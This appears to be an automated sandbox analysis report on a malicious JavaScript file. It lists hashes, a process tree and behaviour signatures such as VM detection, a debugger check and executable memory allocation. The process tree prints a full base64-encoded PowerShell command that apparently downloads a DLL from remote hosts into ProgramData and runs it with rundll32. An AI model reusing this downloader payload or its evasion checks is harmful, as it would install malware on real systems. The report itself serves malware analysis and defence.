Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	June 15, 2023, 9:57 a.m.	June 15, 2023, 9:59 a.m.

Size	305.7KB
Type	ASCII text, with very long lines, with CRLF line terminators
MD5	`6674208a0dd41d67bf69a013118b89e1`
SHA256	`49254874e5dc52e053b24b1af4a44c3ae19bfe7ddba5d6c444d73511f6c750eb`
CRC32	`EA5B3115`
ssdeep	`6144:bSfr0dh2tgcH6YTkM0cNRcpZwg/EBQ+8N/ygD1pRb105RSBnHtnhS:bSfrSh2tgcH6YTkMXRcpZwg/QQ+I/yg0`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\EEmkwV3LNleuc.js
3068
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABaAGEAcgB6AHUAZQBsAGEAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AZwBBADMAQQBDADQAQQBNAFEAQQA0AEEARABjAEEATABnAEEAeABBAEQAZwBBAE8AUQBBAHUAQQBEAFEAQQBNAEEAQQB2AEEARwBZAEEAZAB3AEEANABBAEMAOABBAE0AQQBCAEYAQQBIAGsAQQBVAEEAQQA9AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATgBRAEEAdQBBAEQAUQBBAE0AZwBBAHUAQQBEAEUAQQBNAHcAQQB5AEEAQwA0AEEATQBnAEEAegBBAEQAVQBBAEwAdwBCAGgAQQBFAG8AQQBUAHcAQQB2AEEASABZAEEATQBBAEEAPQBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQAVQBBAEwAZwBBAHkAQQBEAE0AQQBOAGcAQQB2AEEARgBFAEEAYwBBAEIAUQBBAEgARQBBAEwAdwBBADQAQQBIAEUAQQBaAFEAQQAyAEEARQBRAEEAUgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAFUAQQBMAGcAQQB4AEEARABFAEEATQB3AEEAdgBBAEcAbwBBAE4AQQBCAFUAQQBHAG8AQQBhAGcAQgB2AEEARABRAEEATAB3AEIASgBBAEcARQBBAGUAUQBCAFYAQQBGAFUAQQBkAHcAQgBaAEEARQA0AEEAUgB3AEEAPQBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQASQBBAEwAZwBBAHkAQQBEAFUAQQBNAHcAQQB2AEEARwBRAEEAVABBAEIAeQBBAEcAdwBBAFcAQQBBAHgAQQBHAEkAQQBMAHcAQQAxAEEARQBrAEEAZQBRAEIAWgBBAEQAUQBBAFoAUQBCAE0AQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABhAGwAbABuAGUAcwBzAEUAbgBjAHIAaQBuAGkAZABhAGUAIABpAG4AIAAkAFoAYQByAHoAdQBlAGwAYQBzACAALQBzAHAAbABpAHQAIAAiAFIAIgApACAAewB0AHIAeQAgAHsAJABDAHkAbgBpAHAAaQBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGEAbABsAG4AZQBzAHMARQBuAGMAcgBpAG4AaQBkAGEAZQApACkAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAEMAeQBuAGkAcABpAGQAIAAtAE8AIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwAZABpAHMAbwBtAHUAcwAuAGQAbABsADsAJABXAGgAZQBtAG0AZQBsACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBJAEEAWgBRAEIAcABBAEcANABBAFkAdwBCAGgAQQBIAEkAQQBiAGcAQgBoAEEASABRAEEAWgBRAEEAdQBBAEcAawBBAGIAUQBCAHQAQQBHADgAQQBZAGcAQgBwAEEARwB3AEEAYQBRAEIAbABBAEcANABBAHUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgB0AEEARwBrAEEAYwB3AEIAcwBBAEcAawBBAFoAdwBCAG8AQQBIAFEAQQBMAGcAQgAyAEEARwA4AEEAZABBAEIAbABBAEEAPQA9AHUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBwAEEARwA0AEEAYwBnAEIAdgBBAEcARQBBAFoAQQBCAGwAQQBIAEkAQQBRAGcAQgBoAEEASABJAEEAYgBBAEIAbABBAEgAawBBAEwAZwBCAHoAQQBIAFEAQQBkAFEAQgBrAEEARwBrAEEAYgB3AEEAPQAiADsAJABEAGkAcwBzAGkAbQB1AGwAYQB0AGkAbwBuAHMARgBlAGMAawBsAGUAcwBzAG4AZQBzAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHQAQQBHAFUAQQBjAGcAQgBqAEEARwBrAEEAYgBRAEIAbABBAEcANABBAGQAQQBCAFQAQQBIAFUAQQBiAEEAQgB3AEEARwBnAEEAYgB3AEIANABBAEcAawBBAGMAdwBCAHQAQQBDADQAQQBhAEEAQgBoAEEASABVAEEAYwB3AEEAPQBWAEgAWABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFEAQQBOAEEAQQB1AEEARABRAEEATgBRAEEAdQBBAEQARQBBAE4AQQBBADIAQQBDADQAQQBNAGcAQQB3AEEARABZAEEAVgBIAFgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBoAEEARwBvAEEAYgB3AEIAMwBBAEcARQBBAGIAZwBCAHoAQQBFADAAQQBiAHcAQgB1AEEARwA4AEEAYwB3AEIANQBBAEcAdwBBAGIAQQBCAGgAQQBHAEkAQQBhAFEAQgA2AEEARwBVAEEATABnAEIAagBBAEcARQBBAGMAQQBCAHAAQQBIAFEAQQBZAFEAQgBzAEEAQQA9AD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwAZABpAHMAbwBtAHUAcwAuAGQAbABsACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAANgA1ADUAMgAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAFkAdwBCAHQAQQBHAFEAQQBJAEEAQQB2AEEARwBNAEEASQBBAEIAeQBBAEgAVQBBAGIAZwBCAGsAQQBHAHcAQQBiAEEAQQB6AEEARABJAEEASQBBAEIARABBAEQAbwBBAFgAQQBCAFEAQQBIAEkAQQBiAHcAQgBuAEEASABJAEEAWQBRAEIAdABBAEUAUQBBAFkAUQBCADAAQQBHAEUAQQBYAEEAQgBrAEEARwBrAEEAYwB3AEIAdgBBAEcAMABBAGQAUQBCAHoAQQBDADQAQQBaAEEAQgBzAEEARwB3AEEATABBAEIAdABBAEgAVQBBAGMAdwBCADAAQQBEAHMAQQAiADsAJABkAGkAcwBrAG8AZwByAGEAcABoAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAE0AQQBhAEEAQgB2AEEARwBrAEEAYwBnAEIAbgBBAEcAawBBAGMAZwBCAHMAQQBDADQAQQBaAHcAQgAxAEEARwBrAEEAWgBBAEIAbABBAEEAPQA9AHQAUgBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgATQBBAGQAQQBCADEAQQBHADQAQQBjAHcAQgBzAEEARwBVAEEATABnAEIAegBBAEgAVQBBAGMAQQBCAHcAQQBHAHcAQQBhAFEAQgBsAEEASABNAEEAdABSAGMAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABBAEEAYQBBAEIAdgBBAEgAUQBBAGIAdwBCAGoAQQBHAFUAQQBiAEEAQgBzAEEASABNAEEATABnAEIAMgBBAEcAawBBAGMAQQBBAD0AIgA7ACQATwB2AGUAcgBmAGwAYQB2AG8AcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGIAdwBCADEAQQBHADQAQQBkAEEAQgBsAEEASABJAEEAYwB3AEIAMABBAEgASQBBAGQAUQBCAG4AQQBHAGMAQQBiAEEAQgBsAEEARQBZAEEAYwBnAEIAaABBAEcANABBAGEAdwBCAHMAQQBHAEUAQQBiAGcAQgBrAEEARwBrAEEAZABBAEIAbABBAEMANABBAGEAUQBCAHUAQQBIAE0AQQBkAEEAQgBwAEEASABRAEEAZABRAEIAMABBAEcAVQBBAE4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQBnAEEAdQBBAEQARQBBAE0AdwBBADEAQQBDADQAQQBNAGcAQQAxAEEARABVAEEATABnAEEAeQBBAEQARQBBAE8AUQBBAD0ATgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAFEAQQAxAEEAQwA0AEEATgBBAEEAeABBAEMANABBAE0AUQBBADUAQQBEAFEAQQBMAGcAQQAyAEEARABNAEEATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAFUAQQBNAEEAQQB1AEEARABJAEEATgBBAEEAMgBBAEMANABBAE8AQQBBADUAQQBDADQAQQBNAGcAQQB5AEEARABRAEEAIgA7ACQAdwBlAGkAcgBkAGUAcgBBAGcAeQByAGEAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBVAEEAZABnAEIAbABBAEcAawBBAGQAQQBCAHAAQQBIAE0AQQBaAFEAQgB6AEEAQwA0AEEAYgBnAEIAbABBAEgAUQBBAGQAdwBCAHYAQQBIAEkAQQBhAHcAQQA9AHgAaAB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQAQQBBAEwAZwBBAHkAQQBEAEEAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAMgBBAEMANABBAE4AdwBBAHoAQQBBAD0APQAiADsAYgByAGUAYQBrADsAfQB9ACAAYwBhAHQAYwBoACAAewB9AH0A"
  2276

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW June 15, 2023, 9:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 15, 2023, 9:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 15, 2023, 9:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 15, 2023, 9:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA June 15, 2023, 9:57 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 15, 2023, 9:57 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent June 15, 2023, 9:57 a.m.			0	0

Uses Windows APIs to generate a cryptographic key (44 events)

Time & API	Arguments	Status	Return
CryptExportKey June 15, 2023, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051aeb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2023, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051abf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2023, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051abf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2023, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051abf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2023, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051a7f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2023, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051a7f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2023, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051a7f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2023, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051a7f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2023, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051a7f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2023, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051a7f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2023, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051a2f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2023, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051a2f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2023, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051a2f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2023, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051adf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2023, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051adf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2023, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051adf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2023, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051a9b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2023, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051adf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2023, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051adf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2023, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051adf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2023, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051adf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2023, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051adf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2023, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051adf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2023, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051adf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2023, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051acb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2023, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051acb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2023, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051acb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2023, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051acb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2023, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051acb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2023, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051acb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2023, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051acb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2023, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051acb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2023, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051acb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2023, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051acb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2023, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051acb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2023, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051acb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2023, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051acb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2023, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051acb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2023, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051a430 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2023, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051a430 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2023, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051a430 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2023, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051a430 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2023, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051a430 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2023, 9:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0051a430 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx June 15, 2023, 9:57 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 134 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 2097152 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a50000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73971000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0217a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73972000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02172000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02182000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c11000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c12000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02183000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02184000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0263b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02637000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0217b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02635000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02185000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02830000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02186000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0263c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022e3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022e4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022e6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022e8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2023, 9:57 a.m.	process_identifier: 2276 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022e9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
